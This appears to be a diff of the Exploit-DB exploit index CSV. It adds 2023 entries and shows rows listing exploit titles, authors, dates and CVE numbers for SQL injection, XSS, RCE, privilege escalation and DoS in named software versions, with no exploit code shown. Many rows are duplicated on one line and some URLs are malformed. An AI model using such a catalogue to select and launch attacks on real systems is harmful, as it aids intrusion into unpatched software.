34951,exploits/php/webapps/34951.txt,"Online Work Order Suite - Login SQL Injection",2010-11-02,VSN,webapps,php,,2010-11-02,2014-10-13,1,CVE-2010-4186;OSVDB-68972,,,,,https://www.securityfocus.com/bid/44608/info 34951,exploits/php/webapps/34951.txt,"Online Work Order Suite - Login SQL Injection",2010-11-02,VSN,webapps,php,,2010-11-02,2014-10-13,1,CVE-2010-4186;OSVDB-68972,,,,,https://www.securityfocus.com/bid/44608/info
48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,,2020-06-05,2020-06-05,0,,,,,, 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,,2020-06-05,2020-06-05,0,,,,,,
48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,,2020-05-28,2020-05-28,0,,,,,, 48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php,,2020-05-28,2020-05-28,0,,,,,,
51344,exploits/php/webapps/51344.txt,"Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,webapps,php,,2023-04-08,2023-04-08,0,,,,,,
29264,exploits/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,webapps,php,,2013-10-29,2013-10-29,0,OSVDB-99014;OSVDB-99013,,,,,https://www.vulnerability-lab.com/get_content.php?id=1120 29264,exploits/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,webapps,php,,2013-10-29,2013-10-29,0,OSVDB-99014;OSVDB-99013,,,,,https://www.vulnerability-lab.com/get_content.php?id=1120
34469,exploits/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",webapps,php,,2010-08-10,2014-08-30,1,,,,,,https://www.securityfocus.com/bid/42446/info 34469,exploits/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",webapps,php,,2010-08-10,2014-08-30,1,,,,,,https://www.securityfocus.com/bid/42446/info
25158,exploits/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,webapps,php,,2005-02-24,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12647/info 25158,exploits/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,webapps,php,,2005-02-24,2013-05-02,1,,,,,,https://www.securityfocus.com/bid/12647/info
@ -25478,6 +25497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443,2016-04-18,2016-04-18,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.6-RELEASE-i386.iso.gz,http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf 39709,exploits/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,webapps,php,443,2016-04-18,2016-04-18,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.6-RELEASE-i386.iso.gz,http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443,2016-01-25,2016-04-14,0,OSVDB-132268,,,,http://www.exploit-db.compfsense-RELENG_2_2_5.tar.gz, 39306,exploits/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File Cross-Site Request Forgery",2016-01-25,"Aatif Shahdad",webapps,php,443,2016-01-25,2016-04-14,0,OSVDB-132268,,,,http://www.exploit-db.compfsense-RELENG_2_2_5.tar.gz,
39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443,2016-04-14,2016-04-14,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz, 39695,exploits/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services Cross-Site Request Forgery",2016-04-14,"Aatif Shahdad",webapps,php,443,2016-04-14,2016-04-14,0,,,,,http://www.exploit-db.compfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz,
51352,exploits/php/webapps/51352.py,"pfsenseCE v2.6.0 - Anti-brute force protection bypass",2023-04-08,FabDotNET,webapps,php,,2023-04-08,2023-04-08,0,CVE-2023-27100,,,,,
43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15969,,,,, 43090,exploits/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15969,,,,,
22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php,,2012-10-31,2012-10-31,0,OSVDB-86857;OSVDB-86856;OSVDB-86855,,,,,https://www.vulnerability-lab.com/get_content.php?id=736 22373,exploits/php/webapps/22373.txt,"PG Dating Pro CMS 1.0 - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,webapps,php,,2012-10-31,2012-10-31,0,OSVDB-86857;OSVDB-86856;OSVDB-86855,,,,,https://www.vulnerability-lab.com/get_content.php?id=736
17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php,,2011-07-14,2011-07-14,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php 17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php,,2011-07-14,2011-07-14,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php
@ -28501,6 +28521,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2018-11-20,1,CVE-2017-17628,"SQL Injection (SQLi)",,,, 43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2018-11-20,1,CVE-2017-17628,"SQL Injection (SQLi)",,,,
50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,,2021-06-22,2021-06-22,0,,,,,, 50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,,2021-06-22,2021-06-22,0,,,,,,
47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80,2019-08-02,2019-08-02,0,,"SQL Injection (SQLi)",,,, 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80,2019-08-02,2019-08-02,0,,"SQL Injection (SQLi)",,,,
51330,exploits/php/webapps/51330.txt,"Restaurant Management System 1.0 - SQL Injection",2023-04-08,calfcrusher,webapps,php,,2023-04-08,2023-04-08,0,,,,,,
47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,,2019-10-17,2019-10-17,0,,,,,, 47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,,2019-10-17,2019-10-17,0,,,,,,
48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,,2020-10-16,2020-10-16,0,,,,,, 48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,,2020-10-16,2020-10-16,0,,,,,,
34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",webapps,php,80,2014-09-24,2014-09-24,0,CVE-2014-6619;OSVDB-112019,,,,http://www.exploit-db.comRSv1.0.0.zip, 34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",webapps,php,80,2014-09-24,2014-09-24,0,CVE-2014-6619;OSVDB-112019,,,,http://www.exploit-db.comRSv1.0.0.zip,
@ -31981,6 +32002,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,webapps,php,,2010-03-24,,1,,,,,, 11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,webapps,php,,2010-03-24,,1,,,,,,
35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz, 35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz,
23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt 23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt
51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info
44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,, 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,, 7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,,
@ -33673,6 +33695,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,webapps,php,,2008-11-08,,1,OSVDB-49797;CVE-2008-6960,,,,, 7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,webapps,php,,2008-11-08,,1,OSVDB-49797;CVE-2008-6960,,,,,
8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,webapps,php,,2009-04-12,2017-01-02,1,,,,,, 8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,webapps,php,,2009-04-12,2017-01-02,1,,,,,,
28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",webapps,php,80,2013-09-25,2013-09-25,0,CVE-2013-5693;CVE-2013-5692;OSVDB-97366;OSVDB-97365,,,,,https://www.htbridge.com/advisory/HTB23172 28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",webapps,php,80,2013-09-25,2013-09-25,0,CVE-2013-5693;CVE-2013-5692;OSVDB-97366;OSVDB-97365,,,,,https://www.htbridge.com/advisory/HTB23172
51346,exploits/php/webapps/51346.txt,"X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48177,,,,,
51345,exploits/php/webapps/51345.txt,"X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48178,,,,,
38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5074;OSVDB-128086,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/ 38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5074;OSVDB-128086,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/
38321,exploits/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5075;OSVDB-128085,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/ 38321,exploits/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5075;OSVDB-128085,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/
1738,exploits/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,webapps,php,,2006-05-01,2016-12-23,1,OSVDB-25149;CVE-2006-2156,,,,http://www.exploit-db.comx7chat2_0_0.zip, 1738,exploits/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,webapps,php,,2006-05-01,2016-12-23,1,OSVDB-25149;CVE-2006-2156,,,,http://www.exploit-db.comx7chat2_0_0.zip,
@ -37201,6 +37225,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328 42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,, 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,,
42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161 42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161
51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,,
20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info 20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info
20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info 20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info 20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
@ -38925,6 +38950,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows,,2010-09-09,2010-09-10,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14959.png,http://www.exploit-db.comAcoustica-MP3-Audio-Mixer-Installer.exe, 14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows,,2010-09-09,2010-09-10,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14959.png,http://www.exploit-db.comAcoustica-MP3-Audio-Mixer-Installer.exe,
6329,exploits/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,local,windows,,2008-08-28,,1,CVE-2007-3006;OSVDB-43455,,,,, 6329,exploits/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,local,windows,,2008-08-28,,1,CVE-2007-3006;OSVDB-43455,,,,,
47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,,2019-11-12,2019-11-12,0,,,,,, 47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,,2019-11-12,2019-11-12,0,,,,,,
51332,exploits/windows/local/51332.txt,"ActFax 10.10 - Unquoted Path Services",2023-04-08,"Birkan ALHAN",local,windows,,2023-04-08,2023-04-08,0,,,,,,
20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows,,2012-08-29,2012-08-29,1,OSVDB-85175,,,http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-29-at-50812-pm.png,http://www.exploit-db.comactfax_setup_en.exe, 20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows,,2012-08-29,2012-08-29,1,OSVDB-85175,,,http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-29-at-50812-pm.png,http://www.exploit-db.comactfax_setup_en.exe,
50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",2021-09-13,"Salman Asad",local,windows,,2021-09-13,2022-08-01,1,,,,,, 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",2021-09-13,"Salman Asad",local,windows,,2021-09-13,2022-08-01,1,,,,,,
21139,exploits/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,local,windows,,2012-09-08,2012-09-08,1,OSVDB-85175,"Metasploit Framework (MSF)",,,, 21139,exploits/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,local,windows,,2012-09-08,2012-09-08,1,OSVDB-85175,"Metasploit Framework (MSF)",,,,
@ -39626,6 +39652,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,, 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,,
25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/ 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/
26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/ 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/
51351,exploits/windows/local/51351.txt,"ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path",2023-04-08,"Milad karimi",local,windows,,2023-04-08,2023-04-08,0,,,,,,
7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,, 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,,
17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,, 17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,,
19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows,,2012-06-14,2012-06-14,0,OSVDB-82986;CVE-2012-1661,,,,, 19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows,,2012-06-14,2012-06-14,0,OSVDB-82986;CVE-2012-1661,,,,,
@ -40987,6 +41014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14768,exploits/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67496;CVE-2010-5236,,,,, 14768,exploits/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67496;CVE-2010-5236,,,,,
14781,exploits/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67583;CVE-2010-5195,,,,, 14781,exploits/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67583;CVE-2010-5195,,,,,
14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,0,OSVDB-67567,,,,, 14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,0,OSVDB-67567,,,,,
51336,exploits/windows/local/51336.txt,"RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution",2023-04-08,hyp3rlinx,local,windows,,2023-04-08,2023-04-08,0,CVE-2022-47529,,,,,
44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,,2018-06-13,2018-06-13,0,CVE-2018-10619,,,,, 44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,,2018-06-13,2018-06-13,0,CVE-2018-10619,,,,,
47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,, 47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,,
48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,,2020-04-20,2020-04-20,0,,,,,, 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,,2020-04-20,2020-04-20,0,,,,,,
@ -41103,6 +41131,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
